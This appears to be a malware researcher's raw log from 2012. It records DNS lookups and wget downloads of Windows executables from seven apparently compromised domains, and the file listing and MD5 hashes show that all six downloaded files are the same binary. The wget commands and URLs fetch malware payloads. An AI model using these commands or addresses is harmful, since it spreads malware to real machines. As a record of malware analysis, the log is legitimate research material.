http://www.10130138.wavelearn.de/4pxp.exe GET /4pxp.exe HTTP/1.0 Host: www.10130138.wavelearn.de Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://hotnewinfo.info/8fhr0.exe GET /8fhr0.exe HTTP/1.0 Host: hotnewinfo.info Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://saltasalta.cl/8Mo.exe GET /8Mo.exe HTTP/1.0 Host: saltasalta.cl Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Domain lookups: Resolving brianjameswhite.com... 97.74.215.61 Resolving estilianaragdolls.de... 217.119.58.37 Resolving kuntticaret.com... 94.199.206.44 Resolving www.gamarubber.com... 212.36.8.230 Resolving www.10130138.wavelearn.de... 213.157.16.3 Resolving hotnewinfo.info... 174.120.83.189 Resolving saltasalta.cl... 200.29.152.130 Malware EXE's downloaded: Saving to: "Si7ySG.exe" Saving to: "v6e7WMJ.exe" Saving to: "NPY.exe" Saving to: "4pxp.exe" Saving to: "8fhr0.exe" Saving to: "8Mo.exe" $ ls -l Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe 431376 Oct 30 13:00 4pxp.exe 431376 Oct 30 13:01 8fhr0.exe 431376 Oct 30 13:00 8Mo.exe 431376 Oct 30 13:02 NPY.exe 431376 Oct 30 13:01 Si7ySG.exe 431376 Oct 30 13:01 v6e7WMJ.exe $ md5sum Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe f60566d2de1a221a37ddbcd880e8a184 Si7ySG.exe f60566d2de1a221a37ddbcd880e8a184 v6e7WMJ.exe f60566d2de1a221a37ddbcd880e8a184 NPY.exe f60566d2de1a221a37ddbcd880e8a184 4pxp.exe f60566d2de1a221a37ddbcd880e8a184 8fhr0.exe f60566d2de1a221a37ddbcd880e8a184 8Mo.exe -------------------------------------------------------------------------------- Wget logs: $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://brianjameswhite.com/7VTUy.exe --2012-10-30 13:27:41-- http://brianjameswhite.com/7VTUy.exe Resolving brianjameswhite.com... 97.74.215.61 Connecting to brianjameswhite.com|97.74.215.61|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 30 Oct 2012 12:27:43 GMT Server: Microsoft-IIS/7.0 X-Pingback: http://brianjameswhite.com/xmlrpc.php X-Powered-By: ASP.NET Date: Tue, 30 Oct 2012 12:27:43 GMT Connection: keep-alive Content-Length: 1549 2012-10-30 13:27:42 ERROR 404: Not Found. $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://estilianaragdolls.de/Si7ySG.exe --2012-10-30 13:27:51-- http://estilianaragdolls.de/Si7ySG.exe Resolving estilianaragdolls.de... 217.119.58.37 Connecting to estilianaragdolls.de|217.119.58.37|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Tue, 30 Oct 2012 12:27:53 GMT Server: Apache Last-Modified: Tue, 30 Oct 2012 12:01:12 GMT ETag: "bc50a8c-69510-8acd7200" Accept-Ranges: bytes Content-Length: 431376 Keep-Alive: timeout=3, max=25 Connection: Keep-Alive Content-Type: application/x-msdos-program Length: 431376 (421K) [application/x-msdos-program] Saving to: "Si7ySG.exe" 100%[================>] 431,376 1.02M/s in 0.4s 2012-10-30 13:27:52 (1.02 MB/s) - "Si7ySG.exe" saved [431376/431376] $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://kuntticaret.com/v6e7WMJ.exe --2012-10-30 13:28:02-- http://kuntticaret.com/v6e7WMJ.exe Resolving kuntticaret.com... 94.199.206.44 Connecting to kuntticaret.com|94.199.206.44|:80... connected. HTTP request sent, awaiting response... HTTP/1.0 200 OK Date: Tue, 30 Oct 2012 12:28:02 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "69510-508fc1ad-0" Last-Modified: Tue, 30 Oct 2012 12:01:49 GMT Content-Type: application/octet-stream Content-Length: 431376 X-Powered-By: PleskLin Length: 431376 (421K) [application/octet-stream] Saving to: "v6e7WMJ.exe" 100%[================>] 431,376 973K/s in 0.4s 2012-10-30 13:28:02 (973 KB/s) - "v6e7WMJ.exe" saved [431376/431376] $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://www.gamarubber.com/NPY.exe --2012-10-30 13:28:19-- http://www.gamarubber.com/NPY.exe Resolving www.gamarubber.com... 212.36.8.230 Connecting to www.gamarubber.com|212.36.8.230|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Tue, 30 Oct 2012 12:28:21 GMT Server: Apache/1.3.41 (Unix) PHP/4.4.7 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8h Last-Modified: Tue, 30 Oct 2012 12:02:03 GMT ETag: "130c85-69510-508fc1bb" Accept-Ranges: bytes Content-Length: 431376 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Length: 431376 (421K) [application/octet-stream] Saving to: "NPY.exe" 100%[================>] 431,376 227K/s in 1.9s 2012-10-30 13:28:21 (227 KB/s) - "NPY.exe" saved [431376/431376] $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://www.10130138.wavelearn.de/4pxp.exe --2012-10-30 13:28:36-- http://www.10130138.wavelearn.de/4pxp.exe Resolving www.10130138.wavelearn.de... 213.157.16.3 Connecting to www.10130138.wavelearn.de|213.157.16.3|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Tue, 30 Oct 2012 12:28:35 GMT Server: Microsoft-IIS/5.0 Last-Modified: Tue, 30 Oct 2012 12:00:21 GMT ETag: "a801a-69510-508fc155" Accept-Ranges: bytes Content-Length: 431376 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Length: 431376 (421K) [application/octet-stream] Saving to: "4pxp.exe" 100%[================>] 431,376 880K/s in 0.5s 2012-10-30 13:28:37 (880 KB/s) - "4pxp.exe" saved [431376/431376] $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://hotnewinfo.info/8fhr0.exe --2012-10-30 13:28:54-- http://hotnewinfo.info/8fhr0.exe Resolving hotnewinfo.info... 174.120.83.189 Connecting to hotnewinfo.info|174.120.83.189|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Tue, 30 Oct 2012 12:28:56 GMT Server: Apache Last-Modified: Tue, 30 Oct 2012 12:01:22 GMT Accept-Ranges: bytes Content-Length: 431376 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: application/x-msdownload X-Pad: avoid browser bug Length: 431376 (421K) [application/x-msdownload] Saving to: "8fhr0.exe" 100%[================>] 431,376 437K/s in 1.0s 2012-10-30 13:28:55 (437 KB/s) - "8fhr0.exe" saved [431376/431376] $ wget -Sv --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" --referer="" http://saltasalta.cl/8Mo.exe --2012-10-30 13:29:06-- http://saltasalta.cl/8Mo.exe Resolving saltasalta.cl... 200.29.152.130 Connecting to saltasalta.cl|200.29.152.130|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Tue, 30 Oct 2012 12:29:06 GMT Server: Apache Last-Modified: Tue, 30 Oct 2012 12:00:20 GMT Accept-Ranges: bytes Content-Length: 431376 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Length: 431376 (421K) [application/x-msdownload] Saving to: "8Mo.exe" 100%[================>] 431,376 7.35K/s in 47s 2012-10-30 13:29:54 (8.93 KB/s) - "8Mo.exe" saved [431376/431376] --------------------------------------------------------------------------------